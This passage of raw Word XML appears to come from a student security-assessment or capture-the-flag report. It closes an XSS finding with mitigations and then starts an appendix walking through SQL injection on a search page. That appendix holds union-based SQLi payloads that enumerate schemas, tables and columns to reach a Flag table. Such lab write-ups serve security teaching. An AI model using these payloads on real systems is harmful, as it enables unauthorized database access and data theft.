            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>injected</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7CDFAB14" w14:textId="0004A407" w:rsidR="009B42F8" w:rsidRDefault="009C624B" w:rsidP="0010335B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cookies, DOM, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LocatStorage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> can be </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>stolen</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0E5497B8" w14:textId="08C437E8" w:rsidR="009C624B" w:rsidRDefault="002E2C74" w:rsidP="0010335B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Perform AJAX calls to send requests as users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="635FD500" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E662B15" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="_Toc131032167"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6D5913A8" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00735C24" w:rsidP="00735C24">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Input validation and sanitisation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C4869C" w14:textId="1F0C3F35" w:rsidR="00735C24" w:rsidRDefault="00A210A2" w:rsidP="00735C24">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encode user inputs using URL, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r>
              <w:t>ase64 or HTML</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E1870E" w14:textId="2F815E33" w:rsidR="0006480B" w:rsidRDefault="0006480B" w:rsidP="00735C24">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Apply filters, e.g., </w:t>
            </w:r>
            <w:r w:rsidR="007242A5">
              <w:t>use regex to detect &lt;script&gt;. But this is easy to be bypassed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EFDC99" w14:textId="77777777" w:rsidR="00735C24" w:rsidRDefault="00735C24" w:rsidP="00735C24">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>CSP (Content Security Policy)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="408FB000" w14:textId="4F3566B9" w:rsidR="00735C24" w:rsidRDefault="00735C24" w:rsidP="00735C24">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B42F8" w14:paraId="785BD329" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E7B5B81" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="35" w:name="_Toc131032168"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="35"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D8096BA" w14:textId="7429ECDE" w:rsidR="009B42F8" w:rsidRDefault="009C624B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Lecture Slides</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B85B79C" w14:textId="77777777" w:rsidR="009C624B" w:rsidRDefault="009C624B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0770EE92" w14:textId="7F4BD70B" w:rsidR="009C624B" w:rsidRDefault="009C624B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Workshops</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3256D2C9" w14:textId="77777777" w:rsidR="009C624B" w:rsidRDefault="009C624B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D726365" w14:textId="31FF227E" w:rsidR="009C624B" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r w:rsidR="0075166B" w:rsidRPr="0075166B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>MDN</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75C0B1F2" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="7C777A09" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="0E91A57B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04861D0E" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc131032169"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix I - Risk Matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="28154C7F" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="542476A2" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:t>All risks assessed in this report are in line with the ISO31000 Risk Matrix detailed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7FE2B" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="000E7EE2" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="39E6DB3D" wp14:editId="68758834">
            <wp:extent cx="5734050" cy="186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1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47264D9D" w14:textId="77777777" w:rsidR="009B42F8" w:rsidRDefault="009B42F8"/>
    <w:p w14:paraId="237C4BA4" w14:textId="0F775DF3" w:rsidR="009B42F8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1678E645" w14:textId="0809125E" w:rsidR="00310564" w:rsidRPr="005305D8" w:rsidRDefault="00000000" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Appendix_2_-"/>
      <w:bookmarkStart w:id="38" w:name="_Toc131032170"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix 2 - Additional Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="066FED88" w14:textId="77777777" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5862FDBB" w14:textId="7738D8BC" w:rsidR="00FE5DC5" w:rsidRPr="002932C0" w:rsidRDefault="00FE5DC5" w:rsidP="005305D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002932C0">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Section I</w:t>
      </w:r>
      <w:r w:rsidR="002932C0" w:rsidRPr="002932C0">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00E31533" w:rsidRPr="002932C0">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLI on Search Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA84EF4" w14:textId="77777777" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit the search page, input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>' or 1=1 #'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> outputs all results, which indicates it may have SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9E0C6" w14:textId="77777777" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we need to find the number of columns. Since there are 4 columns displayed, we start testing from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>'union select 1,2,3,4#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>, which luckily gives the following result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5160E8C4" w14:textId="20CAE836" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005305D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="233B150B" wp14:editId="0613FED4">
            <wp:extent cx="4676115" cy="537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3023" cy="556768"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FD1ECC7" wp14:editId="29FA97B2">
                <wp:extent cx="303530" cy="303530"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9" name="Rectangle 9" descr="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BBF81C" id="Rectangle 9" o:spid="_x0000_s1026" alt="2.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0DCE8312" w14:textId="72C67B33" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">'union select 1,schema_name,3,4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>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 xml:space="preserve"> to retrieve all the schemas and the result is shown as follows. Now we know the names of all schemas which allow us to dive deeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686F12D" w14:textId="342DB5A4" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005305D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="589E12EB" wp14:editId="29EF3CE3">
            <wp:extent cx="4871281" cy="1692998"/>
            <wp:effectExtent l="0" t="0" r="5715" b="254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10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4943281" cy="1718021"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73756C1A" wp14:editId="452E9BA6">
                <wp:extent cx="303530" cy="303530"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8" name="Rectangle 8" descr="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30634" id="Rectangle 8" o:spid="_x0000_s1026" alt="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41DF288F" w14:textId="77777777" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can search the table names of different schemas. For example, input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">'union select 1, table_name,3,4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> where TABLE_SCHEMA='Secure'#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> will give the following results, including a table named Flag which we should be interested </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2923CE4B" w14:textId="3267354B" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005305D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C743C70" wp14:editId="4C5B784D">
            <wp:extent cx="4888871" cy="1506891"/>
            <wp:effectExtent l="0" t="0" r="698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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5061838" cy="1560204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="333333"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AC10B2A" wp14:editId="7115E581">
                <wp:extent cx="303530" cy="303530"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7" name="Rectangle 7" descr="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32A543" id="Rectangle 7" o:spid="_x0000_s1026" alt="2.3"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5DADCCA4" w14:textId="0F8012A2" w:rsidR="005305D8" w:rsidRDefault="005305D8" w:rsidP="005305D8">
      <w:pPr>
        <w:pStyle w:val="md-end-block"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next, we need to </w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>names of the Flag table</w:t>
      </w:r>
      <w:r w:rsidR="0016107B">
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>’s columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve">. Input </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--monospace)" w:hAnsi="var(--monospace)"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="E7EAED" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve">'union select 1,column_name,3,4 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
